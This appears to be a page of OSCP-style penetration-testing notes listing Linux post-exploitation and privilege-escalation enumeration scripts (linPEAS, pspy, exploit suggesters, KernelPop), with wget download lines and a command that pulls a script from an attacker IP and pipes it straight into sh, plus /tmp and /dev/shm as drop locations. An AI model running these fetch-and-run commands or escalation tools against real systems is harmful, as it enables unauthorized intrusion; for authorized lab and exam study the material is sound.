Linux post exploitation scripts
I personally use linpeas (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) as it's well maintained and frequently updated for latest bugs and patches
Words of wisdom
Be careful with what scripts you are executing as auto exploitation is totally restricted in exam and you are going to fail if you done this mistake , even without your intention so ALWAYS first check what you running before executing it , (Must give attention to 'auto-exploitation' word in scripts)
Execution of script
wget http://<Attacker_IP>/<script_name> | sh | tee output.txt
# This will pull file from attacker box and execute it and also store output to txt fileCommon Location with writable permissions to download and execute scripts
/tmp
/dev/shmbangenum.sh (initial linux enumeration)
wget https://raw.githubusercontent.com/bngr/OSCP-Scripts/master/bangenum.sh
sed -i -e 's/\r$//' bangenum.sh
./bangenum.shPSPY
What is running, any cron jobs any scripts? Use PSPY to find out
https://github.com/DominicBreuker/pspylinux-smart-enumeration
https://github.com/diego-treitos/linux-smart-enumerationSUID search
https://github.com/Anon-Exploiter/SUID3NUMxploit_installer.py (exploit suggester)
wget https://raw.githubusercontent.com/wwong99/pentest-notes/master/scripts/xploit_installer.py
USAGE: xploit_installer.py <exploit id>Unix Priv checker
wget https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.shlinux-local-enum.sh
wget https://raw.githubusercontent.com/Arr0way/linux-local-enumeration-script/master/linux-local-enum.shlinuxprivchecker.py
wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.pylinux-exploit-suggestor.sh
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.shunix-privesc-check.sh
wget https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.shKernelPop
Automated kernel vulnerability enumeration and exploitation
https://github.com/spencerdodd/kernelpopLast updated